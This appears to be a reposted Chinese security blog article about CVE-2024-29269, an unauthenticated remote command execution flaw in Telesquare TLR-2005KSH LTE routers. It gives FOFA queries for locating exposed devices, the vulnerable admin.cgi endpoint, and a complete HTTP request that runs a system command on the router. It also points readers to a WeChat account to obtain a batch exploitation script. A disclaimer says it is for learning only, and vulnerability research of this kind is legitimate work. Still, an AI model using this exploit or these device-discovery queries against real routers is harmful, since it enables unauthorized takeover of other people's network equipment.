CVE-2024-29269-Telesquare路由器RCE-批量poc

admin 2024年4月11日17:33:58评论67 views字数 875阅读2分55秒阅读模式

文章导读

声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。

众亦信安,中意你啊!

点不了吃亏,点不了上当,设置星标,方能无恙!

CVE-2024-29269-Telesquare路由器RCE-批量poc

漏洞描述

Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款Sk电讯Lte路由器,该系统在1.0.0-1.1.4版本之间存在未授权rce漏洞。

资产检索

FOFA:

title="Login to TLR-2005KSH"

app="TELESQUARE-TLR-2005KSH"

漏洞位置

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id

漏洞复现

请求包:

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: x.x.x.x:8085User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

CVE-2024-29269-Telesquare路由器RCE-批量poc

批量poc

关注公众号回复:240411


CVE-2024-29269-Telesquare路由器RCE-批量poc

往这里看

点点关注不迷路,不定时持续分享各种干货。可关注公众号回复"进群",也可添加管理微信拉你入群。

顺便应师傅们要求弄个24年hvv沟通交流群,群人数满了可以添加下方群主微信回复hvv交流。

CVE-2024-29269-Telesquare路由器RCE-批量poc

另外有想去hvv的师傅可以加v

CVE-2024-29269-Telesquare路由器RCE-批量poc

原文始发于微信公众号(众亦信安):CVE-2024-29269-Telesquare路由器RCE-批量poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月11日17:33:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-29269-Telesquare路由器RCE-批量pochttps://cn-sec.com/archives/2648616.html

发表评论

匿名网友 填写信息